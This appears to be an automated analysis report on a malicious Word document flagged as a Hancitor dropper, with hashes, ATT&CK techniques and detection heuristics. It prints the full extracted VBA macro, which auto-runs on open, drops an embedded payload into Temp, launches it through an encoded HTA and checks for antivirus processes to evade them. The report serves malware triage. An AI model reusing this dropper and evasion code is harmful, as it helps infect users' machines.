Office (OLE) malware analysis — malicious · 625e174abe4244dd

MALICIOUS

Office (OLE)

223.0 KB Created: 2018-09-27 13:03:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: d37ef76c88342274d78909c7309d6de0 SHA-1: f7b8d9b324727bb2139b6fa38fc4fc3fd52751c6 SHA-256: 625e174abe4244dd01b8fb82aaad4b7200c6f324e6e6ea7bc0d7a0e8dba247e0

838 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.005 Visual Basic T1140 Deobfuscate or Obfuscate Malicious Code T1027 Obfuscated Files or Information

The sample exploits CVE-2007-3899, a memory corruption vulnerability in Microsoft Word, to execute a Document_Open VBA macro. This macro utilizes WScript.Shell and Win32_Process to launch a Base64-decoded command stager, which appears to be 'cmd.exe /c ping localhost -n 100 &&'. The macro also attempts to save the document as an XML document and quit the application, likely to clean up. An embedded PE executable and an Ole10Native package are also present, suggesting a dropper functionality.

Heuristics 20

CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899

Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
ClamAV: Doc.Dropper.Hancitor-6774061-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Hancitor-6774061-0

XOR-encoded strings (key 0x63) critical SC_XOR_ENCODED

Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0x63: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'

Disassembly

x86 disassembly · validity: uncertain (0.484) — no internal branches to corroborate control flow

000226A5  2f                das
000226A6  0c02              or al, 2
000226A8  07                pop es
000226A9  2f                das
000226AA  0a01              or al, byte ptr [ecx]
000226AC  1102              adc dword ptr [edx], eax
000226AE  111a              adc dword ptr [edx], ebx
000226B0  2263e0            and ah, byte ptr [ebx - 0x20]
000226B3  a360eae67b        mov dword ptr [0x7be6ea60], eax
000226B8  9c                pushfd
000226B9  9c                pushfd
000226BA  9c                pushfd
000226BB  3be8              cmp ebp, eax
000226BD  e67b              out 0x7b, al
000226BF  9c                pushfd
000226C0  9c                pushfd
000226C1  9c                pushfd
000226C2  33e8              xor ebp, eax
000226C4  2e93              xchg ebx, eax
000226C6  329c36bbeae657    xor bl, byte ptr [esi + esi + 0x57e6eabb]
000226CD  9c                pushfd
000226CE  9c                pushfd
000226CF  9c                pushfd
000226D0  338b63636363      xor ecx, dword ptr [ebx + 0x63636363]
000226D6  3b886e350a11      cmp ecx, dword ptr [eax + 0x110a356e]
000226DC  17                pop ss
000226DD  16                push ss
000226DE  020f              add cl, byte ptr [edi]
000226E0  220f              and cl, byte ptr [edi]
000226E2  0f                .byte 0x0f
000226E3  0c00              or al, 0
000226E5  63e0              arpl ax, sp
000226E7  a360eae65b        mov dword ptr [0x5be6ea60], eax
000226EC  9c                pushfd
000226ED  9c                pushfd
000226EE  9c                pushfd
000226EF  3be8              cmp ebp, eax
000226F1  f65b9c            neg byte ptr [ebx - 0x64]
000226F4  9c                pushfd
000226F5  9c                pushfd
000226F6  31e8              xor eax, ebp
000226F8  2693              xchg ebx, eax
000226FA  339c36bbea26db    xor ebx, dword ptr [esi + esi - 0x24d91545]
00022701  33                .byte 0x33
00022702  8b6363            mov esp, dword ptr [ebx + 0x63]

Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE

OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
VBA macros detected medium 9 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set wsh = VBA.CreateObject("WScript.Shell")
```
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Matched line in script
```
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
```
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
Matched line in script
```
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set wsh = VBA.CreateObject("WScript.Shell")
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Open Environ("Temp") & "\1.hta" For Output As #1
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6039 bytes
SHA-256: `381ed55715cd80b983072b52ba54df581b64935b3dd2e02302cdfe4811ba184f`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Call kfs Call sdfsdf Set d = New DataObject d.SetText " " d.PutInClipboard Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveLeft Unit:=wdCharacter, Count:=13 Dim t As Date t = Now Do DoEvents Loop Until Now >= DateAdd("s", 3, t) Call Module1.killo End Sub Private Sub Document_Close() Call closee End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module1" Sub killo() ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument Application.Quit End Sub Attribute VB_Name = "Module2" Sub closee() Dim kjfaa kjfaa = "bd" & "agent.exe" Dim yrtfdsad, vcxvxczcv Dim mbbmbdf Set vcxvxczcv = GetObject("wi" & "nmgmts:") Dim gfdfsfsfs Set yrtfdsad = vcxvxczcv.ExecQuery("SELECT * FROM Win32_Process") Dim hdffsdfs For Each x In yrtfdsad Set wsh = VBA.CreateObject("WScript.Shell") Dim pipec As Boolean: pipec = True If x.Name = kjfaa Then Dim kk kk = StrConv(DecodeBase64("IFd" & "JTkRPV1NUQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQogICAgDQogICAgICAgIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCiAgICAgICAgV3NoU2hlbGwuUnVuKCI2LmV4ZSIsIDEsIGZhbHNlKTsNCiAgICAgICAgDQogICAgPC9zY3JpcHQ+DQogPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPg0KICAgICAgICAgIFdpbmRvdy5DbG9zZQ0KICAgICA8L1NDUklQVD4NCjwvaGVhZD4NCjxib2R5Pg0KICAgDQo8L2JvZHk+DQo8L2h0bWw+DQo="), vbUnicode) Open Environ("Temp") & "\1.hta" For Output As #1 Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode) Print #1, kk Close #1 ChDir Environ("Temp") wsh.Run Environ("Temp") & "\1.hta", 0, False Exit Sub End If If x.Name = "PSUAMain.exe" Then Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide Exit Sub End If If x.Name = "n360.exe" Then Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide Exit Sub End If Next Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module3" Sub kfs() Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveRight Unit:=wdCharacter, Count:=24 Selection.TypeBackspace Selection.Copy End Sub Attribute VB_Name = "Module4" Sub sdfsdf() Dim kk, lll, jgf, tyretw, gdfsfsa gdfsfsa = "6" jgf = "x" & "e" tyretw = jgf & "p" & "i" & "f" kk = ".p" & "if" lll = "6" & ".e" ChDir Environ("Te" & "mp") Selection.TypeBackspace Dim FSO As Object Set FSO = CreateObject("scripting.filesystemobject") FSO.copyfile Source:="5C" & kk, Destination:=lll & jgf Call fadf End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Sub fadf() kk = ".p" & "if" Dim FSO As Object Set FSO = CreateObject("scripting.filesystemobject") FSO.copyfile Source:="5C" & kk, Destination:="6" & ".pif" End Sub Attribute VB_Name = "UserForm3" Attribute VB_Base = "0{03597D0D-30AB-4D75-A9F6-EE18B61C8BF3}{A9048FBB-A586-4F13-AAE7-1E7F621C35B3}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{3C891EA0-7856-4307-ADB2-3551DDC31345}{2D23EF38-5B2A-4D92-A550-6B64DF9CDBD6}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`embedded_office_00018266.exe`	embedded-pe	Office MZ+PE at offset 0x18266	129434 bytes
SHA-256: `bb04da3a5a5fe6c1a325a1f108fc6388566b6d460b70c8620a38d88bf0fd8aea`
Detection ClamAV: No threats found Obfuscation or payload: likely Static shellcode analysis recovered command string(s): WScript.Shell Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1599569394/Ole10Native	82196 bytes
SHA-256: `607d0026727bf484073c93caf0e7528374a294890394b147fc5d7616be42108e`
`ole10native_00_5C.pif`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1599569394/Ole10Native; display_name=5C.pif; full_path=C:\Users\win7home\AppData\Local\Temp\5C.pif; temp_path=; def_file=	81920 bytes
SHA-256: `490f6ee013a56c01dc57fa2e9f5bc7634d5a0800f07c3a820f8eac92efcbacef`

Open this report in the interactive analyzer, or submit your own file for analysis.